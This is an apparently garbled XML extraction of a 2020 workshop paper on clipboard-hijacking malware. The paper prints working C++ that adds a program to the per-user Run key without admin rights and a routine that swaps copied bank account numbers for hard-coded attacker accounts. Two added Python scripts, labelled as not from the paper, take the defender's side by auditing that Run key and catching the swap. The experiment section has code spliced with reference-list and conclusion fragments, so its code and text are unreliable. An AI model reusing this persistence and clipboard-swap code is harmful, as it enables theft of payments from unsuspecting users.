<!DOCTYPE article PUBLIC "-//NLM//DTD JATS (Z39.96) Journal Archiving and Interchange DTD v1.0 20120330//EN" "JATS-archivearticle1.dtd">
<article xmlns:xlink="http://www.w3.org/1999/xlink">
  <front>
<journal-meta>
      <journal-title-group>
        <journal-title>CEUR Workshop Proceedings</journal-title>
      </journal-title-group>
      <issn>1613-0073</issn>
      <self-uri xlink:href="http://ceur-ws.org">CEUR-WS.org</self-uri>
    </journal-meta>
    <article-meta>
      <title-group>
        <article-title>Simple Clipboard Malware Attack Detection and Analysis from the User-Machine Interaction View</article-title>
      </title-group>
      <contrib-group>
        <contrib contrib-type="author">
          <string-name>Michał Wieczorek</string-name>
<xref ref-type="aff" rid="aff0">0</xref>
          <email>michal_wieczorek@hotmail.com</email>
        </contrib>
        <aff id="aff0">
          <label>0</label>
          <institution>Faculty of Applied Mathematics, Silesian University of Technology Kaszubska 23</institution>
          ,
          <addr-line>44-100 Gliwice</addr-line>
          ,
          <country country="PL">Poland</country>
        </aff>
      </contrib-group>
      <fpage>138</fpage>
<lpage>144</lpage>
      <permissions>
        <copyright-statement>© 2020 Copyright for this paper by its authors. Use permitted under Creative Commons License Attribution 4.0 International (CC BY 4.0).</copyright-statement>
        <copyright-year>2020</copyright-year>
      </permissions>
      <abstract>
<p>Malware (a portmanteau of malicious software) is software designed to cause damage to a computer, server, client, or computer network. These malicious programs can be made to steal, encrypt or delete users' data, alter or hijack core computing functions and monitor users' computer activity without their permission. Malware authors can spread their software using a variety of means. For example they can use a USB drive, but also an email or, over the Internet, drive-by downloads. In this work the malware's target is to change a copied bank account number to the hacker's one and to add itself to the registry without the need for administrator privileges. The program was made using the standard Microsoft C++ libraries included in Visual Studio.</p>
      </abstract>
      <kwd-group>
<kwd>Malware</kwd>
        <kwd>Clipboard attack</kwd>
        <kwd>Virus detection</kwd>
        <kwd>Virus prevention</kwd>
</kwd-group>
      <conference>
        <conf-name>IVUS 2020: Information Society and University Studies</conf-name>
        <conf-date>23 April 2020</conf-date>
        <conf-loc>KTU Santaka Valley, Kaunas, Lithuania</conf-loc>
      </conference>
    </article-meta>
  </front>
  <body>
<sec id="sec-1">
      <title>1. Introduction</title>
      <p>The history of hacking reaches back to the 1960s. At first the term “hacker” was used to describe people who spent all day programming and doing things no one ever thought possible (like “geek” or “nerd” today), but over time it changed more and more to describe people who find bugs in code, or in a system, to exploit them and potentially use them for criminal purposes. Nowadays hackers are divided into “White hats”, “Black hats” and “Grey hats”. White hats are the “good guys” who find bugs and work with the programmers to fix them, and in the end make the software more secure. Black hats, on the other hand, use vulnerabilities for their own purposes, often stealing money or destroying the victim’s computer. Grey hats are hobbyists who hack for fun. They usually don’t steal money but can write very annoying viruses to “troll” people and make them think about their security. Sometimes they may help to fix the bug, but it’s not their main goal.</p>
      <p>Nowadays, as computers are becoming much more popular and easy to buy, and the Internet is widely available, hacking is present at every turn. In fact, there is a hacker attack every 39 seconds [<xref ref-type="bibr" rid="ref1">1</xref>]. Because of that, looking for exploits is a very popular subject of research. There are several works which show how to detect an attack and block it using the device or the system configuration, or another program implemented for protection. In [<xref ref-type="bibr" rid="ref2">2</xref>] it was discussed how to find malware traces by using the permission requests and API calls recorded in the registry of a mobile device. One of the methods of stealing information from a computer user is to attract their attention with some other accepted action while, in the background, the important data is stolen. In [3] it was discussed how this type of attack can be carried out with a pdf-based model, in which the pdf contains the virus code, so that when the user opens it the action that swaps the information is taken. In [4] a wide range of definitions and examples from various areas was presented. There are various areas where an attack can cause a lot of damage. One of them is the medical Internet of Things [5]. In this area the fight is not just for money but very often for human life. An interesting discussion of recent advances and new challenges for malware in medical environments was presented in [6].</p>
      <p>Scientific work moves toward detection of and prevention from these attacks. Some of the most efficient mechanisms are based on the latest ideas from artificial intelligence. Neural networks and bio-inspired mechanisms serve as detectors of malware or protectors against information loss. In [<xref ref-type="bibr" rid="ref7">7, 8</xref>] a method was presented to verify users by analyzing voice samples, where the amplitude is analyzed in time shift by a bio-inspired mechanism, while in [9, 10] an intelligent home system was implemented to support communication between users and devices. Deep learning and other methods of artificial intelligence have gained an advantage in the detection of malware attacks by simple and efficient analysis of a wide spectrum of computer actions. In [11] an algorithm based on deep learning was used to detect attacks by analyzing the actions in the system. A similar model based on a deep learning approach was presented in [12]. Convolutional neural networks can be transformed to work with normalized information about phishing, where the graphical code of the attack is analyzed by a trained model, as presented in [13], while [14] discussed how to use a graph-based model to analyze an attack, where the stages of the malware are defined in decision model levels. There are several possibilities to attack computer users and several ways to detect them. All depends on the ability to analyze the actions. In each of the domains the attack has different aspects; therefore the method of prevention should be oriented on those special details to win the fight with the virus.</p>
      <p>In this paper a code sample with experiments and the action design are discussed to show the weak and strong points of each of the attacks. The discussion shows which of the potential areas are most vulnerable, at the same time presenting how we can detect or prevent unwanted actions. As an example a scheme of bank account swapping is discussed, since this issue can be the most important one for the everyday user of the Internet.</p>
    </sec>
    <sec id="sec-2">
      <title>2. Admin or normal user - is there a difference for the computer virus?</title>
      <p>We will start our analysis by showing some potential differences at the system level, in which the user’s system rights can be the main background of the malware attack. There are two classes of malware:</p>
      <list list-type="bullet">
        <list-item>
          <p>one that needs administrator privileges to run (the user must accept installation and launch of that program, and must be an administrator);</p>
        </list-item>
        <list-item>
          <p>one that works without the need for the user to accept anything.</p>
        </list-item>
      </list>
      <p>Programs which have admin privileges can do virtually anything and are easy to make because there are no limitations, but they are less successful. The reason is simple – not all users have an administrator account and, if they have one, most of them do not allow every application to have that access. The biggest problem here is social engineering: making the program look as appealing as possible so that people run it. The user is convinced that the program is the original one, while in fact the program they use is just a fake one, developed with the highest possible similarity in order to steal the information. The second option is more dangerous but requires a high understanding of the security of the operating system and of programming. If done correctly, it doesn’t even need interaction from the user. A schematic attack option is presented in Fig. 1.</p>
    </sec>
    <sec id="sec-3">
      <title>3. Protection</title>
      <p>We now know the vulnerabilities of our system, but what can we do to protect ourselves?</p>
      <sec id="sec-3-1">
        <title>3.1. Firewall</title>
        <p>The first option, already built into our system, is the firewall. It’s a "shield" that protects us from dangers coming from the Internet or even from our own local network. It works by controlling incoming and outgoing network traffic based on predetermined security rules [15]. It is very useful because it may prevent an attack via the Internet and the remote installation of malware, and forces the hacker either to have physical contact with our computer or to deceive us into installing the software.</p>
        <p><bold>First Generation: Packet Filters</bold> The first reported type of network firewall is called a packet filter. Packet filters act by inspecting packets transferred between computers. When a packet does not match the packet filter’s set of filtering rules, the packet filter either drops (silently discards) the packet, or rejects the packet (discards it and generates an Internet Control Message Protocol notification for the sender); otherwise it is allowed to pass [15]. It may work in different ways. For example, it may block ports that are known to have security issues or protocols that are classified as not safe.</p>
        <p><bold>Second Generation: Stateful Filters</bold> The next step in firewall evolution came with the stateful packet filtering firewall (or the stateful inspection firewall, as it is often referred to). This type of firewall has the same limitations as the static packet filtering firewall, with the exception of being state-aware. The stateful packet filter still operates at the network layer of the OSI model, although some may extend into the transport layer (layer 4) to collect state information. Despite the stateful packet filter being application-unaware, it does offer limited advantages over the basic static packet filter [<xref ref-type="bibr" rid="ref16">16</xref>]. This type of firewall is however potentially vulnerable to DoS and DDoS attacks that bombard the firewall with fake connections in an attempt to overwhelm it by filling its connection state memory [15].</p>
        <p><bold>Third Generation: Application Layer</bold> An application firewall is a form of firewall that controls input, output, and/or access from, to, or by an application or service. It operates by monitoring and potentially blocking the input, output, or system service calls that do not meet the configured policy of the firewall. The application firewall is typically built to control all network traffic on any OSI layer up to the application layer. It is able to control applications or services specifically [17].</p>
      </sec>
      <sec id="sec-3-2">
        <title>3.2. Anti-Virus and Anti-Malware Software</title>
        <p>Software that is nowadays already pre-installed (in Windows 10) is the anti-virus. Antivirus software is a type of program designed to protect computers from malware like viruses, computer worms, spyware, botnets, rootkits, keyloggers and such. Antivirus programs can scan for, detect and remove viruses from your computer [18]. A specific component of anti-virus and anti-malware software, commonly referred to as an on-access or real-time scanner, hooks deep into the operating system’s core or kernel and functions in a manner similar to how certain malware itself would attempt to operate, though with the user’s informed permission for protecting the system. Any time the operating system accesses a file, the on-access scanner checks if the file is a ’legitimate’ file or not. If the file is identified as malware by the scanner, the access operation will be stopped and the file will be dealt with by the scanner in a pre-defined way [19]. It may prevent our computer from being attacked and, with the help of the firewall, can protect us from the dangers of the Internet. However, it does not work 100% of the time, and there are a lot of hackers who can create malware that would not be detected by anti-virus software.</p>
      </sec>
      <sec id="sec-3-3">
        <title>3.3. Common Sense</title>
        <p>There are a lot of other ways to protect ourselves, but one of the most important things that will protect us from hackers is common sense. For example, installing illegal software and downloading things that are normally paid for "for free" from the Internet is a good way to also download some viruses and other malicious software on the same occasion. Therefore it is recommended to only download the official releases of software directly from the producer’s web page. Clicking weird links from unknown emails or SMSs is also a very bad idea. Some basic tips for keeping yourself safe:</p>
        <list list-type="bullet">
          <list-item>
            <p>Keep operating systems and application software up to date.</p>
          </list-item>
          <list-item>
            <p>Install and regularly update anti-virus and firewall protection on all computers.</p>
          </list-item>
          <list-item>
            <p>Set your browser to use medium or high security settings and to automatically install updates.</p>
          </list-item>
          <list-item>
            <p>Turn on the pop-up blocker.</p>
          </list-item>
          <list-item>
            <p>If you use social media, don’t share your full email contact list – it could lead to you and your contacts receiving spam and phishing e-mails [20].</p>
          </list-item>
        </list>
      </sec>
    </sec>
    <sec id="sec-4">
      <title>4. Experiment</title>
<sec id="sec-4-1">
        <p>The system was implemented in C++. Here is an example of a function developed to add the registry key that launches the application at OS startup without the need for administrator privileges. As an example we present how simple system facilities can be used to alter the system’s records for the banking malware.</p>
        <preformat>BOOL RegisterMyProgramForStartup(PCWSTR pszAppName, PCWSTR pathToExe, PCWSTR args)
{
    // first we create the variables used later in the program
    // and initialise them with default values
    HKEY hKey = NULL;
    LONG lResult = 0;
    BOOL fSuccess = TRUE;
    DWORD dwSize;
    // the command line is built as a quoted path followed by the arguments;
    // the buffer and its opening quote were lost in the extracted text and
    // are restored here
    wchar_t szValue[2 * MAX_PATH] = L"\"";
    const size_t count = sizeof(szValue) / sizeof(szValue[0]);
    wcscat_s(szValue, count, pathToExe);
    wcscat_s(szValue, count, L"\" ");
    if (args != NULL)
    {
        wcscat_s(szValue, count, args);
    }
    // here we open (or create) the per-user Run key
    lResult = RegCreateKeyExW(HKEY_CURRENT_USER,
        L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
        0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &amp;hKey, NULL);
    fSuccess = (lResult == 0);
    // if that succeeded we set the key's value to point at our malware
    if (fSuccess)
    {
        dwSize = (wcslen(szValue) + 1) * 2;
        lResult = RegSetValueExW(hKey, pszAppName, 0, REG_SZ, (BYTE*)szValue, dwSize);
        fSuccess = (lResult == 0);
    }
    // in the end we close the registry key
    if (hKey != NULL)
    {
        RegCloseKey(hKey);
        hKey = NULL;
    }
    // we return the status of the function
    return fSuccess;
}

void RegisterProgram()
{
    wchar_t szPathToExe[MAX_PATH];
    GetModuleFileNameW(NULL, szPathToExe, MAX_PATH);
    // here we launch our function to add the program to the registry
    RegisterMyProgramForStartup(L"converter", szPathToExe, L"-foobar");
}</preformat>
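        <p>As a defender-side counterpart to RegisterProgram(), the following is an added example (not code from the paper) that audits the per-user Run key the sample writes to: it parses the text printed by reg query for HKCU\Software\Microsoft\Windows\CurrentVersion\Run and flags entries whose executable lives in a folder any standard user can write to, which is the footprint of a persistence entry installed without administrator rights. The reg query output embedded below is constructed; the user name, the paths and the USER_WRITABLE folder list are assumptions.</p>
        <preformat><![CDATA[
```python
r"""Audit the per-user Run key that RegisterProgram() writes to.

Added example, not the paper's code. It parses the text that
`reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` prints
and flags entries whose executable lives in a folder a standard user can
write to: a start-up entry there was installed without any privilege
check, which is exactly what the paper's sample does.
"""
import re

# Path fragments of folders a standard user can write to (assumption;
# extend the tuple to match your environment).
USER_WRITABLE = ("\\appdata\\", "\\downloads\\", "\\desktop\\",
                 "\\temp\\", "\\users\\public\\")

# One value line of `reg query`: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(r"^ {4}(?P<name>.+?) {4}(?P<type>REG_\w+) {4}(?P<data>.*)$")

# Constructed sample output; the user name and the paths are made up.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Steam    REG_SZ    "C:\Program Files (x86)\Steam\steam.exe" -silent
    converter    REG_SZ    "C:\Users\alice\Downloads\converter.exe" -foobar
"""


def executable_of(command_line):
    """Return the program path from a Run value: the quoted token if the
    command line starts with a quote (as the paper's sample builds it),
    otherwise the first whitespace-separated token."""
    command_line = command_line.strip()
    if command_line.startswith('"'):
        end = command_line.find('"', 1)
        return command_line[1:end] if end != -1 else command_line[1:]
    return command_line.split(" ", 1)[0]


def audit_run_key(reg_query_output):
    """Return one dict per Run entry whose executable sits in a user-writable
    folder. The result is a triage queue, not a verdict: per-user installs
    such as OneDrive legitimately start from AppData, so pair this with a
    publisher-signature check or an allow-list before acting on it."""
    findings = []
    for line in reg_query_output.splitlines():
        match = VALUE_LINE.match(line)
        if not match:
            continue
        exe = executable_of(match.group("data"))
        hits = [frag for frag in USER_WRITABLE if frag in exe.lower()]
        if hits:
            findings.append({"name": match.group("name"), "exe": exe,
                             "reason": "executable under " + hits[0]})
    return findings


if __name__ == "__main__":
    for finding in audit_run_key(SAMPLE_REG_QUERY):
        print(finding["name"], "->", finding["exe"], "|", finding["reason"])
```
]]></preformat>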
        <p>The second thing was the main algorithm changing
copied bank account to the one we specify. This code
is pretty simple. The ClipboardChanger() function is
called every 5 seconds (can be changed to any value
in the code) and if the copied text is a bank account
it changes it for one of the 3 accounts written in the
code. If not nothing happens.
void ClipboardChanger()
{
//here we declare our variables
//and set the default values
char *buffer = NULL;
CString fromClipboard;
CString source = "";
HWND hwnd = GetClipboardOwner();
if (OpenClipboard(hwnd))
{
//if opening the clipboard works
//we copy the text to
//fromClipboard variable</p>
        <p>HANDLE hData = GetClipboardData(CF_TEXT);
char* buffer = (char *)GlobalLock(hData);
fromClipboard = buffer;
//here we check if copied text
//is a correct bank account
if ((is_account(fromClipboard) == true))
{
//here we randomly pick one of
//3 specified accounts
int random = (rand() % 3) + 1;
if (random == 1)
{</p>
        <p>source = "106000760000320000057153";
}
else if (random == 2)
{
}
else if (random == 3)
{</p>
        <p>source = "106000760000320000057154";
else
source = "106000760000320000057155";
source = "";
source = fromClipboard;
} [1] hacking-statistics, 2020. URL: https:
//hostingtribunal.com/blog/hacking-statistics/
//here we clear the clipboard #gref.</p>
        <p>HGLOBAL clipbuffer; [2] M. Alazab, M. Alazab, A. Shalaginov, A. Mesleh,
EmptyClipboard(); A. Awajan, Intelligent mobile malware detection
using permission requests and api calls, Future
//the rest of the code sets the Generation Computer Systems 107 (2020) 509–
//clipboard buffer for the one 521.
//we want [3] D. Maiorca, B. Biggio, G. Giacinto, Towards
clipbuffer = GlobalAlloc(GMEM_DDESHARE, adversarial malware detection: Lessons learned
source.GetLength() + 1); from pdf-based attacks, ACM Computing
Surveys (CSUR) 52 (2019) 1–36.
buffer = (char*)GlobalLock(clipbuffer); [4] O. Suciu, S. E. Coull, J. Johns, Exploring
adversarstrcpy(buffer, LPCSTR(source)); ial examples in malware detection, in: 2019 IEEE
GlobalUnlock(hData); Security and Privacy Workshops (SPW), IEEE,
GlobalUnlock(clipbuffer); 2019, pp. 8–14.</p>
        <p>
          SetClipboardData(CF_TEXT, clipbuffer); [5] F. Beritelli, A. Spadaccini, A statistical approach
CloseClipboard(); to biometric identity verification based on heart
} sounds, in: Proceedings - 4th International
Con} ference on Emerging Security Information,
Systems and Technologies, SECURWARE 2010, 2010,
The above is_account() function for performance rea- pp. 93–96.
sons checks if the copied text has the right length, then [6] M. Wazid, A. K. Das, J. J. Rodrigues, S. Shetty,
if all characters are numbers and in the end computes Y. Park, Iomt malware detection approaches:
the control sum to be sure if the bank account is cor- Analysis and research challenges, IEEE Access
rect or it’s just a very large number. (2019).
[
          <xref ref-type="bibr" rid="ref4">7</xref>
          ] D. Połap, M. Woźniak, R. Damaševičius,
        </p>
        <p>R. Maskeliu¯nas, Bio-inspired voice evaluation
5. Conclusions mechanism, Applied Soft Computing 80 (2019)
342–357.</p>
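        <p>As an added example (not the paper's code) of detecting the swap from the user-machine interaction view, the following script replays a constructed stream of user copy actions and clipboard updates and flags a clipboard change that turns one valid account number into another with no copy action preceding it. It also implements the three checks the text attributes to is_account(); the checksum rule used (mod-97 over the Polish NRB read as an IBAN), the one-second window and the event format are assumptions.</p>
        <preformat><![CDATA[
```python
r"""Detect the clipboard swap that ClipboardChanger() performs.

Added example, not the paper's code. A defensive agent on Windows can see two
things: the user's copy actions (a keyboard hook catching Ctrl+C) and every
clipboard change (WM_CLIPBOARDUPDATE, with the new text). The paper's swap
shows up as a clipboard update that turns one valid account number into a
different one with no copy action shortly before it. The event stream below
is constructed; the window length and the checksum rule are assumptions.
"""
import re

NRB_LENGTH = 26     # Polish NRB: 2 check digits followed by a 24-digit BBAN
COUNTRY_CODE = "PL"


def _digits(text):
    """Strip the spacing people paste account numbers with."""
    return re.sub(r"\s+", "", text)


def is_account(text):
    """The three checks the paper's is_account() performs: length, all digits,
    control sum. The control sum here is the ISO 13616 mod-97 test of the NRB
    read as a Polish IBAN (the paper does not state which formula it uses)."""
    digits = _digits(text)
    if len(digits) != NRB_LENGTH or not digits.isdigit():
        return False
    rearranged = digits[2:] + COUNTRY_CODE + digits[:2]    # BBAN, country, check
    numeric = "".join(str(int(ch, 36)) for ch in rearranged)  # P->25, L->21
    return int(numeric) % 97 == 1


def detect_swaps(events, window=1.0):
    """events: (seconds, kind, text) in time order, kind "copy" or "clipboard".
    Returns one alert per clipboard update that replaced an account number with
    a different one while no user copy happened in the preceding window."""
    alerts = []
    last_copy = float("-inf")
    current = ""                    # text we believe the clipboard holds
    for when, kind, text in events:
        if kind == "copy":
            last_copy = when
            continue
        if kind != "clipboard":
            continue
        user_initiated = (when - last_copy) <= window
        if (not user_initiated and _digits(text) != _digits(current)
                and is_account(current) and is_account(text)):
            alerts.append({"time": when, "was": current, "now": text})
        current = text
    return alerts


# Constructed event stream. USER_ACCOUNT is a widely published Polish example
# IBAN; SWAPPED_ACCOUNT is the paper's first sample account with check digits
# computed here so that it passes is_account().
USER_ACCOUNT = "61 1090 1014 0000 0712 1981 2874"
SWAPPED_ACCOUNT = "65106000760000320000057153"
EVENTS = [
    (0.00, "copy", ""),                      # user presses Ctrl+C
    (0.02, "clipboard", USER_ACCOUNT),       # clipboard now holds their account
    (3.50, "clipboard", SWAPPED_ACCOUNT),    # no copy before it: the swap
    (9.00, "copy", ""),
    (9.01, "clipboard", "invoice 2020/04"),  # legitimate re-copy, not an account
    (14.0, "clipboard", SWAPPED_ACCOUNT),    # background change, but the old
]                                            # value was no account: no alert

if __name__ == "__main__":
    for alert in detect_swaps(EVENTS):
        print("t=%.2f clipboard swapped %s -> %s"
              % (alert["time"], alert["was"], alert["now"]))
```
]]></preformat>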
        <p>The whole idea of presented attack is defined in block [8] M. Wozniak, D. Polap, G. Borowik, C. Napoli, A
chart shown in Fig. 3. By analyzing this schema we ifrst attempt to cloud-based user verification in
can see how the malware software may attack and which distributed system, in: 2015 Asia-Pacific
Conwould be potential weak points in the system or com- ference on Computer Aided System Engineering,
munication with the user. In Fig. 4 we can see how IEEE, 2015, pp. 226–231.
the time of processing is related to the length of input [9] M. Woźniak, D. Połap, Intelligent home systems
data strings. for ubiquitous user support by using neural
net</p>
        <p>This article’s main goal is to show that creating that works and rule based approach, IEEE
Transackind of malware is easy, so everyone can write it not tions on Industrial Informatics (2019).
only for scientific reasons but also with bad intentions [10] G. Lo Sciuto, S. Russo, C. Napoli, A cloud-based
in mind. That’s why we should build our awareness lfexible solution for psychometric tests
validaand protect ourselves from hackers. This is why we tion, administration and evaluation, in: CEUR</p>
      </sec>
    </sec>
  </body>
  <back>
<ref-list>
      <ref id="ref1">
        <mixed-citation>hacking-statistics, 2020. URL: https://hostingtribunal.com/blog/hacking-statistics/#gref.</mixed-citation>
      </ref>
      <ref id="ref2">
        <mixed-citation>M. Alazab, M. Alazab, A. Shalaginov, A. Mesleh, A. Awajan, Intelligent mobile malware detection using permission requests and api calls, Future Generation Computer Systems 107 (2020) 509–521.</mixed-citation>
      </ref>
      <ref id="ref3">
        <mixed-citation>D. Maiorca, B. Biggio, G. Giacinto, Towards adversarial malware detection: Lessons learned from pdf-based attacks, ACM Computing Surveys (CSUR) 52 (2019) 1–36.</mixed-citation>
      </ref>
      <ref id="ref4">
        <mixed-citation>O. Suciu, S. E. Coull, J. Johns, Exploring adversarial examples in malware detection, in: 2019 IEEE Security and Privacy Workshops (SPW), IEEE, 2019, pp. 8–14.</mixed-citation>
      </ref>
      <ref id="ref5">
        <mixed-citation>F. Beritelli, A. Spadaccini, A statistical approach to biometric identity verification based on heart sounds, in: Proceedings - 4th International Conference on Emerging Security Information, Systems and Technologies, SECURWARE 2010, 2010, pp. 93–96.</mixed-citation>
      </ref>
      <ref id="ref6">
        <mixed-citation>M. Wazid, A. K. Das, J. J. Rodrigues, S. Shetty, Y. Park, IoMT malware detection approaches: Analysis and research challenges, IEEE Access (2019).</mixed-citation>
      </ref>
      <ref id="ref7">
        <mixed-citation>D. Połap, M. Woźniak, R. Damaševičius, R. Maskeliūnas, Bio-inspired voice evaluation mechanism, Applied Soft Computing 80 (2019) 342–357.</mixed-citation>
      </ref>
      <ref id="ref8">
        <mixed-citation>M. Wozniak, D. Polap, G. Borowik, C. Napoli, A first attempt to cloud-based user verification in distributed system, in: 2015 Asia-Pacific Conference on Computer Aided System Engineering, IEEE, 2015, pp. 226–231.</mixed-citation>
      </ref>
      <ref id="ref9">
        <mixed-citation>M. Woźniak, D. Połap, Intelligent home systems for ubiquitous user support by using neural networks and rule based approach, IEEE Transactions on Industrial Informatics (2019).</mixed-citation>
      </ref>
      <ref id="ref10">
        <mixed-citation>G. Lo Sciuto, S. Russo, C. Napoli, A cloud-based flexible solution for psychometric tests validation, administration and evaluation, in: CEUR Workshop Proceedings, volume 2468, 2019, pp. 16–21.</mixed-citation>
      </ref>
      <ref id="ref11">
        <mixed-citation>D. Yuxin, Z. Siyi, Malware detection based on […] Applications 31 (2019) 461–472.</mixed-citation>
      </ref>
      <ref id="ref12">
        <mixed-citation>R. Vinayakumar, M. Alazab, K. Soman, P. Poor[…]cess 7 (2019) 46717–46738.</mixed-citation>
      </ref>
      <ref id="ref13">
        <mixed-citation>J. Nowak, M. Korytkowski, P. Najgebauer, […]cessing Systems 15 (2019) 60–67.</mixed-citation>
      </ref>
      <ref id="ref14">
        <mixed-citation>Z. Ma, H. Ge, Y. Liu, M. Zhao, J. Ma, A combina[…]gorithms, IEEE Access 7 (2019) 21235–21245.</mixed-citation>
      </ref>
      <ref id="ref15">
        <mixed-citation>Firewall_(computing), 2020. URL: https://en.wikipedia.org/wiki/Firewall_(computing).</mixed-citation>
      </ref>
      <ref id="ref16">
        <mixed-citation>stateful-packet-filtering, 2020. URL: […]computer-science/stateful-packet-filtering.</mixed-citation>
      </ref>
      <ref id="ref17">
        <mixed-citation>Application_firewall, 2020. URL: https://en.wikipedia.org/wiki/Application_firewall.</mixed-citation>
      </ref>
      <ref id="ref18">
        <mixed-citation>define-antivirus, 2020. URL: https://antivirus.comodo.com/security/define-antivirus.html.</mixed-citation>
      </ref>
      <ref id="ref19">
        <mixed-citation>Malware, 2020. URL: https://en.wikipedia.org/wiki/Malware.</mixed-citation>
      </ref>
      <ref id="ref20">
        <mixed-citation>ten-common-sense-tips-on-cyber-security, 2020. URL: https://usaaef.org/ […]</mixed-citation>
      </ref>
    </ref-list>
  </back>
</article>